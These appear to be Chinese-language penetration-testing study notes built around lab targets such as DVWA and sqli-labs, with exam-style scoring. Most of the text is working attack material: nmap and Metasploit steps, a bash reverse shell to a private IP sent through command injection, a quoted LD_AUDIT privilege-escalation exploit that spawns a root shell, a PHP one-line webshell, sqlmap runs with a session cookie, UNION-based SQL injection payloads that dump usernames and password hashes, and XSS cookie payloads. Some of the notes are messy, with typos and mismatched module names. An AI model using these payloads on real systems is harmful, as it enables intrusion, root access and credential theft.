摘要:astartx进入图形界面
astartx进入图形界面
端口扫描:
nmap 192.168.1.10 #扫描同一段的ip
nmap 192.168.1.0/24 #扫描整个段
nmap -sT 192.168.1.118 #-sT来实现tcp连接扫描
nmap -sU 192.168.1.119 #-sU来实现udp扫描
nmap -sN 22,25,80,3306 192.168.1.118 #扫描指定端口
nmap 192.168.1.118 -oX hh.xml #扫描结果导出到hh.xml
抓包:
tcpdump –nnX tcp and host 192.168.1.119 #这里的ip为攻击机
数据抓取监控
wireshark
转换格式:
xsltproc hh.xml -o hh.html
漏洞扫描:
firefox https://localhost:8834
msfconsole 攻击:
漏洞代码:MS04_007
search ms04_007 #查看该漏洞使用的exploit模块
use exploit/windows/iis/ms01_026_dbldecode #使用模块
show options #查看设置参数
set RHOST 192.168.1.173 #设置RHOST(攻击目标)
SET LHOST 192.168.1.174 #设置LHOST(攻击机)
show options #查看需要设置哪些配置参数
exploit #漏洞利用,会看到ip 192.168.1.173反弹连接到了我们本地的4444端口
成功!
DVWA渗透:
nc -v-l-p 80 #监听本机80端口
;/bin/bash –i > /dev/tcp/172.16.1.52/80|0<&1 2>&1 #在注入漏洞模块提交
此时本机Kali中会反弹回来一个被攻击机的shell
id #查看用户属性
uname -a #查看系统版本号
通过提取文档进行复制粘贴提取
;/bin/bash –i > /dev/tcp/10.1.7.69/80|0<&1 2>&1
<span style="color: rgb(51, 51, 51);"--<------------------------------------------
提权exp详细解析:
# 在/tmp下创建可控制的目录
$ mkdir /tmp/exploit
# 链接到suid二进制程序以更改$ORIGIN的定义
$ ln /bin/ping /tmp/exploit/target
# 打开到目标二进制程序的文件描述符
$ exec 3< /tmp/exploit/target
# 现在可通过/proc访问描述符
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*
# 删除之前所创建的目录
$ rm -rf /tmp/exploit/
# /proc链接仍存在,但已标记为已被删除
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)
# 使用负载DSO替换目录,使$ORIGIN成为到dlopen()的有效目标
$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*
# 通过LD_AUDIT强制/proc中的链接加载$ORIGIN
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
<span style="color: rgb(51, 51, 51);"--<------------------------------------------
当UID=0,即得root权限
建立一个一句话木马文件
echo "<?php @ecal(\$_POST[\"elab\"]); ?>" > /dvw/aa.php
菜刀进入
http://172.16.1.57/dvwa/aa.php
sqlmap:
该界面是通过输入用户id 查询用户信息,用户id 是小于20的id
1.找到sql注入点,通过 ' 字符验证有SQL注入漏洞(1分)
1''
http://blog.sina.com.cn/s/blog_5c92dd1f0102vjfg.html
2.查看页面源代码,找到页面"Submit"的名字和值,并截屏(2分)
右键加V 查找
3.通过浏览器及其插件得到cookie 值,并截屏(2分)
4.在xclient 用sqlmap 做注入攻击,获取后台的数据库信息,操作系统信息,以及web系统信息,并截
屏(2分)
5.在xclient 用sqlmap 做注入攻击,获取当前数据库名,并截屏(2分)
sqlmap -r /root/aaa.txt --dbs
<code>./sqlmap.py -u“http://10.10.10.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” –cookie=”PHPSESSID=57p5g7f32b3ffv8l45qppudqn3;security=low” -b –current-db –current-user” 1、–cookie : 设置我们的cookie值“将DVWA安全等级从high设置为low” 2、-u : 指定目标URL 3、-b : 获取DBMS banner 4、–current-db : 获取当前数据库 5、–current-user:获取当前用户 </code>
#aaa.txt为cookie
6.在xclient 用sqlmap 做注入攻击,获取当前数据库的所有表,并截屏(2分)
sqlmap -r /root/aaa.txt -D dvwa --tables
7.猜测当前的用户信息表名,在xclient 用sqlmap 做注入攻击,获取当前数据库的用户表的结构,并截屏(2分)
sqlmap -r /root/aaa.txt -D dvwa -T users --columns
#-T : 要枚举的DBMS数据库表 –columns : 枚举 DBMS数据库表中的所有列
8.在xclient 用sqlmap 做注入攻击,获取当前数据库的用户表内容信息,并截屏(2分)
sqlmap -r /root/aaa.txt -D dvwa -T users-C user,password --dump
<code>- -T : 要枚举的DBMS数据表 - -C: 要枚举的DBMS数据表中的列 - –dump : 转储DBMS数据表项 用法:python sqlmap [options] - - 选项: - -h,--help显示基本帮助消息并退出 - -hh显示高级帮助消息并退出 - --version显示程序的版本号并退出 - -v VERBOSE等级:0-6(默认值1) - - 目标: - 必须提供这些选项中的至少一个来定义 - 目标 - - -u URL,--url = URL目标URL(例如“http://www.site.com/vuln.php?id=1”) - -g GOOGLEDORK将Google dork结果作为目标网址进行处理 - - 请求: - 这些选项可用于指定如何连接到目标URL - - --data = DATA通过POST发送的数据字符串 - --cookie = COOKIE HTTP Cookie头值 - --random-agent使用随机选择的HTTP User-Agent头值 - --proxy = PROXY使用代理连接到目标URL - --tor使用Tor匿名网络 - - 检查Tor检查Tor是否正确使用 - - 注射: - 这些选项可用于指定要测试的参数, - 提供自定义注入有效载荷和可选的篡改脚本 - - -p TESTPARAMETER可测试参数 - --dbms = DBMS将后端DBMS强制为此值 - - 检测: - 这些选项可用于自定义检测阶段 - - --level = LEVEL要执行的测试级别(1-5,默认为1) - --risk =风险执行测试的风险(0-3,默认值1) - - 技术: - 这些选项可用于调整特定SQL注入的测试 - 技术 - - --technique = TECH SQL注入技术使用(默认为“BEUSTQ”) - - 枚举: - 这些选项可用于枚举后端数据库 - 管理系统信息,结构和数据包含在 - 表。此外,您可以运行自己的SQL语句 - - -a,--all检索所有内容 - -b,--banner检索DBMS横幅 - --current-user检索DBMS当前用户 - --current-db检索DBMS当前数据库 - --passwords枚举DBMS用户密码散列 - --tables枚举DBMS数据库表 - - 列列举DBMS数据库表列 - --schema枚举DBMS模式 - - 转储转储DBMS数据库表条目 - --dump-all转储所有DBMS数据库表条目 - -D DB DBMS数据库枚举 - -T TBL要列举的DBMS数据库表 - -C COL DBMS数据库表列列出 - - 操作系统访问: - 这些选项可用于访问后端数据库管理 - 系统底层操作系统 - - --os-shell提示交互式操作系统shell - --os-pwn提示OOB shell,Meterpreter或VNC - - 一般: - 这些选项可用于设置一些一般工作参数 - - --batch不要求用户输入,使用默认行为 - --flush-session刷新当前目标的会话文件 - - 杂: - --sqlmap-shell提示交互式sqlmap shell - --wizard初学者用户的简单向导界面 - - [!]以“-hh”运行的完整选项列表 - root @ kali:〜# </code>
sql手动注入:
http://localhost/sqlilabs/Less-2/?id=1id
是一个注入点
后台的SQL语句的写法大致为
1
|
select username,password,[....] from table where id=userinput |
那么我们通过使用order by
的语句来判断select
所查询字段的数目。# SELECT 语句用于从表中选取数据。
那么payload变为:
1
|
http://localhost/sqlilabs/Less-2/?id=1 order by 1/2/3/4.... |
当使用order by 4
时程序出错,那么select
的字段一共是3个。
得到显示位
在页面上会显示从select
中选取的字段,我们接下来就是要判断显示的字段是哪几个字段。
使用如下的payload(两者均可)进行判断。
1
2
|
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,3 http://localhost/sqlilabs/Less-2/?id=1 and 1=2 union select 1,2,3 |
当使用个如上的payload时,页面的显示如下:
通过如上的页面显示就可以知道,页面中显示的是第2位和第3位的信息。
查选库
在知道了显示位之后,那么接下来就可以通过显示位来显示我们想知道的信息,如数据库的版本,用户信息等等。那么我们使用如下的payload就可以知道相关的信息。
1
|
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,version(), database () |
此时页面的显示为:
可以看到在页面上就出现了数据库的版本信息和当前使用的数据库信息。
那么接下来我们通过这种方式知道数据库中所有的数据库的名称。
payload如下:
1
2
3
|
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,SCHEMA_NAME, from information_schema.SCHEMATA limit 0,1 #得到第一个库名 http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,SCHEMA_NAME, from information_schema.SCHEMATA limit 1,1 #得到第二个库名 ... |
查选表名
由于database()
返回的就是当前web程序所使用的数据库名,那么我们就利用database()
来查询所有的表信息。当然在上一步中。我们也已经知道当前的database
就是security
。
那么我们构造的payload如下:
1
|
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema= database () |
这样我们就得到当前数据库下所有的表名了。页面返回的结果是:
所以我们知道在当前的数据库中存在4张表,分别是emails,referers,uagents,users
。
查选列名
在知道了表名之后,接下来我们利用information_schema.columns
就可以根据表名来获取当前表中所有的字段。
payload如下:
1
2
|
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name= 'users' http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273(users的十六进制) |
页面的显示结果如下:
通过这个语句,我们就知道在users表中存在USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,id,name,password
这些字段。但是我本地测试的测试的时候,这个存在一个问题,实际上在security数据库的users的表中,只有id,username,password
这3个字段,其他的字段都是其他数据库的中users表的字段名。
通过上面的payload,我们也同样可以知道在emails,referers,uagents
中的字段名称。
但是有的时候后台的代码可能仅用了使用where
子句,那么这个时候就无法通过information_schema.coumns
来得到列名了,这个时候只能够根据你自己多年的黑客经验来进行猜解了。猜解的方法也是比较的简单,使用exists
子句就可以进行猜解了。假设在我们已经知道了表名的情况下(当然猜解表名也使用通过exists子句来完成)。
猜解的语句如下:
1
|
http://localhost/sqlilabs/Less-2/?id=1 and exists( select uname from users) |
主要的语句就是exists(select 需要猜解的列名 from users)
这种句式。如果在users表中不存在uname
列名,则页面不会显示内容或者是直接出现sql的错误语句。
如下如所示:
下面这个就是猜解到了users表中存在的字段。
1
|
http://localhost/sqlilabs/Less-2/?id=1 and exists( select username from users) |
猜测在users表中存在username
列,上面的语句程序可以正常第返回结果,那么寿命在users表中确实存在username
列名。
脱裤
在知道了当前数据库所有的表名和字段名之后,接下来我们就可以dump数据库中所有的信息了。比如我们下载当前users表中所有的数据。
可以使用如下的payload:
1
|
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(username, password ),3 from users |
就可以得到users表中所有的username
和password
的数据了,通过这种方式也能够得到其他表中的数据了。
2):
union select 1,2,3,4,5,6,7,8,9,10,11 from #说明字段长度是
1' union select database(),user()# 查询user用户
-1' union select database(),user()#
-1' union select version(),@@version_compile_os#
version() 获取当前数据库版本,@@version_compile_os获取当前操作系统
-1' union select column_name,2 from information_schema.columns where table_schema= 'dvwa' and table_name= 'users'#
爆出dvwa表,2可修改
-1' union select column_name,2 from information_schema.columns where table_schema= 'dvwa' and table_name= 'users'# 查看表名为users的
查看表名为user的
-1' union select user,password from users#
爆出users表的user和password数据
php sql注入:
safe_mode = on 开启过滤 'OR"=' 万能账号
xss 跨脚本攻击:
user='<script>alert(document.cookie);</script>'
防护:magic_quotes_gpc
%22><script>alert(document.cookie);</script>
>
DVWA手动注
HackBar 网页调试插件
http://10.1.4.30/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#
1' union select database(),user()#
------------
http://10.1.4.30/vulnerabilities/sqli/?id=1%27+union+select+database%28%29%2Cuser
%28%29%23&Submit=%E6%8F%90%E4%BA%A4#
------------
ID:1'union select database(),user()#
名字:admin
姓氏:admin
ID:
1'union select database(),user()#
名字:dvwa
姓氏:root @ localhost
-------------------------------------------------------------------------------------
-1' union select database(),user()#
------------
http://10.1.4.30/vulnerabilities/sqli/?id=-1%27+union+select+database%28%29%2Cuser
%28%29%23&Submit=%E6%8F%90%E4%BA%A4#
------------
ID:
-1'union select database(),user()#名字:dvwa
姓氏:root @ localhost
---------------------------------------------------------------------------------------
-1' union select version(),@@version_compile_os#
------------
http://10.1.4.30/vulnerabilities/sqli/?id=-1%27+union+select+version%28%29%2C
%40%40version_compile_os%23&Submit=%E6%8F%90%E4%BA%A4#
------------
version() 获取当前数据库版本,@@version_compile_os获取当前操作系统
ID:-1'union select version(),@@ version_compile_os#
名字:5.5.48-log
姓氏:Linux
---------------------------------------------------------------------------------------
-1' union select table_name,2 from information_schema.tables where table_schema= 'dvwa'#
ID:-1'union select table_name,2 from information_schema.tables where table_schema
='dvwa'#
名:guestbook
姓氏:2
ID:-1'union select table_name,2 from information_schema.tables where table_schema
='dvwa'#
名字:users
姓氏:2
爆出来两个表
------------------------------------------------------------------------------------------
-1' union select column_name,2 from information_schema.columns where table_schema= 'dvwa' and table_name= 'users'#
ID:-1'union select column_name,2 from information_schema.columns where table_schema
='dvwa' and table_name ='users'#
名字:user_id
姓氏:2
ID:-1'union select column_name,2 from information_schema.columns where table_schema
='dvwa'and table_name ='users'#
名:first_name
姓氏:2
ID:-1'union select column_name,2 from information_schema.columns where table_schema
='dvwa'and table_name ='users'#
名字:last_name
姓氏:2
ID:-1'union select column_name,2 from information_schema.columns where table_schema
='dvwa'and table_name ='users'#
名:user
Surname:2
ID:-1'union select column_name,2 from information_schema.columns where table_schema
='dvwa'and table_name ='users'#
名字:password
姓氏:2
ID:-1'union select column_name,2 from information_schema.columns where table_schema
='dvwa'and table_name ='users'#
名:avatar
姓:2
----------------------------------------------------------------------------
-1' union select user,password from users#
爆破user,password表数据
ID :-1'union select user,用户密码#
名:admin
姓氏:5f4dcc3b5aa765d61d8327deb882cf99
ID:
-1'union select user,
用户密码#名:gordonb
姓:e99a18c428cb38d5f260853678922e03
ID :-1'union select user,用户密码#
名:1337
姓:8d3533d75ae2c3966d7e0d4fcc69216b
ID :-1'union select user,用户密码#
名:pablo
姓:0d107d09f5bbe40cade3de5c71e9e9b7
ID :-1'union select user,用户密码#
名
:smithy姓:5f4dcc3b5aa765d61d8327deb882cf9
admin密码通过MD5解密得到字符串是“5f4dcc3b5aa765d61d8327deb882cf99”,解密的结果
为“password”!
-----------------------------------------------------------------------------------
low:
1.判断是否存在注入,注入是字符型还是数字型
输入1,查询成功:
输入1’and ‘1’ =’2,查询失败,返回结果为空:
输入1’or ‘1234 ’=’1234,查询成功:
返回了多个结果,说明存在字符型注入。
2.猜解SQL查询语句中的字段数
1' or 1=1 order by 1,2,3#查询失败:
1' or 1=1 order by 1,2#查询成功:
说明执行的SQL查询语句中只有两个字段,即这里的First name、Surname。
(这里也可以通过输入union select 1,2,3…来猜解字段数)
3.确定显示的字段顺序
输入1′ union select 1,2 #,查询成功:
说明执行的SQL语句为select First name,Surname from 表 where ID=’id’…
4.获取当前数据库
输入1′ union select 1,database() #,查询成功:
说明当前的数据库为dvwa。
5.获取数据库中的表
输入1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #,查询成功:
说明数据库dvwa中一共有两个表,guestbook与users。
<code>用sql获取数据库中所有的表名的方法: 1、oracle下:select table_name from all_tables; 2、MySQL下:select table_name from information_schema.tables where table_schema='csdb' and table_type='base table'; 3、sql server下:select name from sys.tables go </code>
6.获取表中的字段名
输入1′ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #,查询成功:
说明users表中有8个字段,分别是user_id,first_name,last_name,user,password,avatar,last_login,failed_login。
7.下载数据
输入1′ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #
查询成功:
这样就得到了users表中所有用户的user_id,first_name,last_name,password的数据。
最新评论